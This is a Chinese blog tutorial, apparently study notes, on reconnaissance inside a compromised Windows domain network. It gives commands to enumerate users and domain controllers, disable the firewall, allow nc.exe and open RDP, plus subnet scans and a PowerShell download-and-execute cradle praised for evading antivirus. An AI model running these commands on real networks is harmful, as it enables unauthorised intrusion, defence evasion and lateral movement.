内网安全学习从入门到入狱-知识-内网信息收集

内网信息收集-工作组和域内基本信息收集

  • 内网安全学习从入门到入狱-知识-内网信息收集
    • 0x01本机检查--先看看我是谁
      • 查询并开启远程连接服务
    • 0x02域内信息收集
      • 查询当前额权限
      • 判断是否有域
      • 查找域控
        • 获取域内的用户信息
    • 0x03 域内网存活主机的探测
      • 主机存活扫描
      • 域内端口扫描
        • PowerSploit 中的 Invoke-Portscan.ps1 脚本
  • 前提准备

本文中PowerShell脚本可以自行下载

https://github.com/PowerShellMafia/PowerSploit

0x01本机检查–先看看我是谁

域内的主机一般都是批量的,所以我们看看我们自己,基本上大家也就是差不多的情况

先看看ip,看看网卡,内外网情况,IP段记录一下,DNS

ipconfig /all

查看用户列表

net user

查看在线的用户

query user || qwinsta

查看本机管理员

net localgroup administrators

看管理员进程

tasklist /v

域管理进程 hack\adminishtartor

还有一些常见杀软

360sd…EXE 360
360tray.EXE 360
ZHUDONGFANGYU.EXE 360
KSAFETRAY.EXE 金山
MACAFEE MCSHIELD.EXE MacAfee
AVP.EXE K卡巴斯基
AVGGUARD.EXE 小红伞
EGUI.EXE Nod32
  • 查看进程 too
  wmic process list brief
  • 查看端口
  netstat -ano
systeminfo  或者 wmic qfe get Caption,Description,HotFixID,InstalledOn
  • 查看共享列表

net share           wmic share get name,path,status

(1)关闭防火墙
Windows Server 2003 系统及之前版本

  netsh firewall set opmode disable

Windows Server 2003 之后系统版本,命令如下。

  netsh advfirewall set allprofiles state off
  • 修改防火墙配置
    Windows Server 2003 系统及之前版本,允许指定程序全部连接,命令如下。
    netsh firewall add allowedprogram c:\nc.exe “allow nc” enable
    Windows Server 2003 之后系统版本,情况如下。
     允许指定程序连入,命令如下。
  netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C: \nc.exe"

 允许指定程序连出,命令如下。

  netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C: \nc.exe"

允许 3389 端口放行,命令如下。

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

查询并开启远程连接服务

查看远程连接端口

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber

在 Windows Server 2003 中开启 3389 端口

wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1

在 Windows Server 2008 和 Windows Server 2012 中开启 3389 端口

一般前两个命令就开启了

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

查询域控制器列表

Net group "Domain Controller" /domain

收集管理员列表

Net group "Domain admins" /domain

  • 列出或断开本地计算机和连接的客户端的会话
  • net session

0x02域内信息收集

查询当前额权限

  • 获取域 SID
  whoami  /all
  • 查询指定账户的详细信息。
  net user XXX /domain

判断是否有域

主要利用

ifconfig /all
systeminfo
net view /domain            查询域
net view /domain:XXX    查询此域内所有计算机
net group /domain               查询域内所有用户
net config workstation
net time /domain

net group "domain computers" /domain   查询所有域成员计算机net accounts /domain  获取域密码信息
这个在大型内网,多个域很重要
获取域信任信息nltest /domain_trusts

查找域控

可以看到域控制器机器名

nltest /DCLIST:hack

查看域控制器的主机

Nslookup -type=SRV _ldap._tcp
获取域内的用户信息

获取域内用户信息

net user /domain

查看存在用户

dsquery user

0x03 域内网存活主机的探测

主机存活扫描

内网探测要点

  • 避免使用大流量攻击的软件和图形化的东西
  • 避免杀软敏感操作
  • 尽量使用系统自带的组件
  • 上班和下班多次扫描,可以进行对比网络情况

1.利用netbios快速探测内网

Netbios.exe 192.168.0.1/24

2.利用 ICMP 协议快速探测内网----ping命令主要使用—有的ping不通很正常

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

3.通过 ARP 扫描探测内网

arp-scan 工具
Arp.exe –t 192.168.1.0/20     Nishang 中的 Invoke-ARPScan.ps1扫描
powershell.exe -exec bypass -Command "& {Import-Module C:\windows\temp\Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.1.0/24}" >> C:\windows\temp\log.txtEmpire 中的 arpsan 模块
usemodule situational_awareness/network/arpscan
set Range 192.168.1.0-192.168.0.254
execute

4.利用TCP UDP工具扫描

ScanLine 是一款经典的端口扫描工具 体积小,动静小

scanline -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,3389,5432 -u 53,161,137,139 -O c:\windows\temp\log.txt -p 192.168.1.1-254 /b

域内端口扫描

建议 wmi和powershell工具 动静小好

S扫描器

Metasploit 包含多种端口扫描技术,与其他扫描工具接口良好。在 msfconsole 下运行“search portscan”命令,即可进行搜索。

PowerSploit 中的 Invoke-Portscan.ps1 脚本

这个强大之处在于是无文件落地的扫描,很强大,

可以绕过一些杀软

主要机子要联网能连接到 GitHub这个地址
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\res.txt"


内网安全学习从入门到入狱-知识-内网信息探测与收集相关推荐

  1. 内网安全学习从入门到入狱-知识-内网基础知识

    内网安全学习从入门到入狱-知识-内网基础知识 文章目录 内网安全学习从入门到入狱-知识-内网基础知识 内网渗透基础 基本的名词介绍 工作组 域 活动目录(AD) DC 域控制器(DC) DNS域名服务 ...

  2. 内网安全学习从入门到入狱-知识-内网隧道技术小结

    文章目录 0x00 内网穿透技术 0x01 首先判断出网协议 0x02 各种协议隧道 网络层 ICMP隧道 Lcx 传输层 瑞士军刀:nc Powercat(powershell版的nc) 推荐:ne ...

  3. mysql记录和字段_科学网—MySQL学习笔记:计算同一条记录内各字段之和,并判断是否归一 - 丁祥欢的博文...

    ★计算同一记录中不同字段之和 背景说明:MainDB表内有几十个字段用于存放配方数据,需要将它们加起来看看是否归一. 由于MySQL没有类似高版本Access那样的计算字段,因为需要用SQL语法来处理 ...

  4. 【慕课网】人工智能-语音入门|公开课知识整理

    人工智能-语音入门 该博客是慕课网视频教程的笔者自我小结,原视频传送门 References: 语音增强理论与实践-[美]罗艾洲等 [译]高毅等 WAV和PCM的关系和区别 AudioSet数据集 知 ...

  5. python视频教程推荐it教程网_Python视频教程之入门基础篇_IT教程网

    资源名称:Python视频教程之入门基础篇 资源目录: [IT教程网]320b96cae58124db5fb6e7c5df99aefc [IT教程网]699434136852f34ec720f2a34 ...

  6. python(十四)--Django学习快速入门

    Django学习快速入门 1. 预备知识 1.1 什么是http协议 1.2 MVC模式和MTV模式 1.2.1 MVC 模式 1.2.2 MTV 模式 2. Django框架介绍 2.1 什么是框架 ...

  7. Kali学习之从入门到入狱(三)

    Kali学习之从入门到入狱 冒个泡 开篇 1 Linux 常见目录 2 Linux基础命令 2.0 环境变量 2.1 apt-get 安装 2.2 ls ll 和 alias 2.3 花式grep 2 ...

  8. 慕课网《Flutter从入门到进阶》学习笔记二

    文章目录 Flutter必备Dart基础:Dart快速入门 学习资料 4-1 Flutter之Dart概述 4-2 Flutter之Dart常用数据类型(数字.类型转换) 4-3 Flutter之Da ...

  9. 渗透测试入门2之进入内网

    渗透测试入门2之进入内网 1. 基于企业弱账号漏洞 VPN(通过邮箱,密码爆破,社工等途径获取VPN) 企业相关运维系统(zabbix等) 2. 基于系统漏洞进入 Metasploit(漏洞利用框架) ...

最新文章

  1. 如何创建systemd定时任务
  2. 【iOS_Development】文件操作
  3. Ubuntu安装Ceres库-安装依赖时报错:E:无法定位软件包 libcxsparse3.1.2_朱国鑫的博客-CSDN博客
  4. ArrayDeque中的取余
  5. mingw编译boost_1_66_0
  6. replication crash safe
  7. java中的sleep()和wait()的区别
  8. Linux下RabbitMQ服务器搭建
  9. mac memcached_Mac OS X上的Java Memcached
  10. 使用prismjs为网站添加代码高亮功能
  11. 计算机按应用可分为几类,计算机按性能可以分为哪几类
  12. 3个平台下的ffmpeg——ffmpeg编译
  13. 华为5G折叠屏手机Mate X 重新入网,即将上市!
  14. 深度学习中的数据增强方法
  15. 这所211怒将自己学生告成老赖:90后校友承诺捐母校1100万未兑现
  16. 支付产品理解第一篇——使用第三方支付的信息流与资金流
  17. Spring IOC的工作原理
  18. python编程字典数据库_python基础数据类型之字典、集合
  19. C++11 decltype类型推导详解
  20. python入门与实战-python介绍

热门文章

  1. Linux 命令(176)—— pstree 命令
  2. 推荐:SQL Server 2000看图教程(PDF)
  3. 啮齿动物1型和2型糖尿病并发症模型 糖尿病肾病模型
  4. CSS-background背景详解
  5. 不同的总线结构对计算机性能影响,总线结构对计算机性能的影响
  6. Compose系列:Recomposition重组作用域
  7. Python爬虫 | 爬取全书网小说斗罗大陆
  8. echarts 柱状图带 表格展示
  9. 硬件先生---第 3 部分:电源知识(Power)-3.2-DC-DC
  10. ntp国家授时中心服务器IP地址